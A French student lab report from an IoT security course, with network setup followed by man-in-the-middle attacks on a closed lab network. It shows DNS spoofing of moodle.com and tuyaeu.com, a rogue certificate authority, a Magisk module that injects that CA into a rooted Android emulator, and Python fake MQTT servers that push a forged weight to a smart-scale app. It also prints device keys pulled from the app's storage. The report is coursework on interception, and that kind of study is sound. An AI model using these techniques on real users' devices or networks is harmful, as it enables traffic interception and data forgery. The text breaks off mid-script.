"raw_values": "{\"change_mode\":{\"range\":[\"direct\",\"gradient\"]}, \"bright\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}, \"temperature\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}, \"h\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":360,\"step\":1},\"s\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":255,\"step\":1},\"v\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":255,\"step\":1}}",
"values": {
"change_mode": {
"range": [
"direct",
"gradient"
]
},
"bright": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"temperature": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"h": {
"min": 0,
"scale": 0,
"unit": "",
"max": 360,
"step": 1
},
"s": {
"min": 0,
"scale": 0,
"unit": "",
"max": 255,
"step": 1
},
"v": {
"min": 0,
"scale": 0,
"unit": "",
"max": 255,
"step": 1
}
}
},
"30": {
"code": "rhythm_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"31": {
"code": "sleep_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"32": {
"code": "wakeup_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"41": {
"code": "remote_switch",
"type": "Boolean",
"values": {}
}
}
}
]

>> Saving list to devices.json
1 registered devices saved

>> Saving raw TuyaPlatform response to tuya-raw.json

Poll local devices? (Y/n):

Scanning local network for Tuya devices...
1 local devices discovered

Polling local devices...
[Ampoule Connectée ] 172.16.10.108 - [On] - DPS: {'20': True, '21': 'white', '22': 1000, '23': 1000, '25': '000e0d0000000000000000c80000', '26': 0, '41': True}

>> Saving device snapshot data to snapshot.json

>> Saving IP addresses to devices.json
1 device IP addresses found

Done.

</syntaxhighlight>

SE5 IdO sécurité des objets 2025/2026 b1

2026-01-24T08:46:03Z

Vdetrez : /* Sécurisation WiFi par WPA2-PSK */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi et sécurisation WiFi par WPA2-PSK (29/09) =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

Pour cette seconde tentative, j'utilise les commandes suivantes avec plusieurs ISO Android.<syntaxhighlight lang="linux-config">
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d
qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370
</syntaxhighlight>J'ai pu donc pu faire face:

- À un ISO sans les services Google et sans navigateur ...

- Un trop ancien pour Nedis

- Un qui refuse l'installation d'APK

- Un trop récent pour l'installation de certificat.

- Un qui refuse de se laisser root

En fin de séance, je n'ai malheureusement pas de VM Android fonctionnelle.

== Ultime tentative (qui marche) ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

On va créer un faux serveur pour déchiffrer ce que nous dit la balance.<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>On constate que dès que la balance tente de se connecter elle ferme la connexion pour cause "no shared cipher".

Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisque qu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

Il faudrait réussir un injecter le certificat dans la balance en communicant directement avec elle.

== Envoi de fausses informations vers l'application ==

Dans cette partie, nous allons tenter d'envoyer un poids à l'application depuis notre serveur.

L'appli tape sur 443 et 8883 (mqtt qui fonctionne avec tls) comme on peut le voir sur cet extrait:<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# tcpdump -i eth1 -n src 172.16.10.102 and not port 53

...

11:59:46.829382 IP 172.16.10.102.53314 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:47.005041 IP 172.16.10.102.54915 > 172.16.10.255.54915: UDP, length 263
11:59:47.295737 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.346713 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [S], seq 1755898328, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.347853 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [.], ack 273869652, win 255, length 0
11:59:47.534641 IP 172.16.10.102.53318 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0

...

11:59:48.189587 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [P.], seq 517:547, ack 1256, win 251, length 30
11:59:48.190681 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:48.256593 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0
11:59:48.324124 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

</syntaxhighlight>

On va donc tenter d'envoyer des informations erronés de notre serveur vers notre application.

Dans un premier temps on va tenter d'établir une connexion sécurisé entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour quelle ajoute un poids dans l'application.

On tente donc d'envoyer en clair le poids vers l'application de Nedis<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# cat fake_serv2.py
import socket
import ssl
import time
import json
import struct

# ================= CONFIGURATION =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

PAYLOAD_POIDS = {
"protocol": 4,
"t": int(time.time()),
"data": {
"dps": {
"1": 8050,
"2": True,
"3": "kg"
}
}
}
# =================================================

def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS prêt sur {PORT}")

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# ================= HANDLERS =================

# CONNECT
if pkt_type == 1:
print(">>> CONNECT reçu")
conn.send(b"\x20\x02\x00\x00")
print("<<< CONNACK envoyé")

# SUBSCRIBE
elif pkt_type == 8:
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")

# SUBACK (QoS 1 accepté)
suback_payload = msg_id + b"\x01"
conn.send(create_mqtt_packet(9, 0x00, suback_payload))
print("<<< SUBACK OK")

# Mapping OUT -> IN
pub_topic = topic.replace("/out/", "/in/")
print(f"Publication sur : {pub_topic}")

time.sleep(0.5)

json_payload = json.dumps(PAYLOAD_POIDS)
topic_bytes = pub_topic.encode()

var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
conn.send(packet)

print(f"Payload envoyé (NON chiffré)")

# PINGREQ
elif pkt_type == 12:
conn.send(b"\xd0\x00")

else:
print(f"Packet MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur connexion : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>

On cherche dans le fichier shared_prefs situé dans /data/data/com.nedis.smartlife sur la VM android une clé local qui permettrai de chiffrer le message pour que Nedis l'accepte.<syntaxhighlight lang="linux-config">
emulator64_x86_64_arm64:/data/data/com.nedis.smartlife/shared_prefs # grep -r "localKey"

./sig_mesh_storage.xml: <string name="sig_mesheu176237y8062605m7Ddzpr3a6d803edeb314f364c55d2caab540918">[{"appkey":"2FC5C9F42A44F9D243F960231C370DC6","code":"mebf11e37fc6632a9b44qg","endTime":0,"ivIndex":0,"key":"mebf11e37fc6632a9b44qg","localKey":"674d29fb978a1705","meshId":"mebf11e37fc6632a9b44qg","meshKey":"2FC5C9F42A44F9D243F960231C370DC6","meshkey":"2FC5C9F42A44F9D243F960231C370DC6","name":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","netWorkkey":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","password":"fa1667ca872e46d4","pv":"2.1","resptime":0,"share":false,"startTime":0,"tempShare":false}]</string>
</syntaxhighlight>Je vais apprendre plus tard que cette clé est une clé qui permet de sécuriser l'échange Bluetooth entre la balance et le téléphone lors de la première connexion. Mais avant de le savoir, j'ai tenté d'améliorer le faux serveur avec cette clé.<syntaxhighlight lang="linux-config">
#!/usr/bin/env python3
import socket
import ssl
import time
import json
import struct
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# ================= CONFIG =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

# LOCAL KEY 16 caractères
LOCAL_KEY = b"674d29fb978a1705"

# DPS balance (poids correct pour Nedis)
DPS_POIDS = {
"1": 8050, # 80.50 kg
"2": 1, # stable
